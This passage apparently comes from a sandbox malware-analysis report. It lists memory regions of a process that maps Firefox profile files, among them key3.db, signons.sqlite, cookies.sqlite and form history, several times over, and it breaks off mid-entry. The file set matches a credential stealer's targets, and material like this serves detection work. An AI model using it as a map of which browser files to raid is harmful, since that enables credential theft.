"content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 5082 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 5083 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 5084 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 5085 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 5086 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 5087 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 5088 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 5089 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 5090 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 5091 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 5092 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 5093 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 5094 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5095 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5096 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5097 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5098 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5099 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5100 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5101 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5102 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5103 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "profiles.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini") Region: id = 5104 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5105 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5106 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5107 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 5108 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 5109 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 5110 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 5111 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 5112 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 5113 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 5114 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5115 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 5116 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 5117 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 5118 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 5119 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 5120 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 5121 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 5122 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 5123 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 5124 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 5125 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 5126 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5127 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5128 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5129 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5130 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5131 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5132 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5133 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5134 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5135 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "installtime20131025151332" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332") Region: id = 5136 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 5137 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 5138 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 5139 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 5140 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 5141 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 5142 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 5143 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 5144 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 5145 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 5146 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 5147 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 5148 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 5150 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 5151 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 5152 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 5153 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 5154 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 5155 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5156 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5157 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5158 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5159 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5160 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = 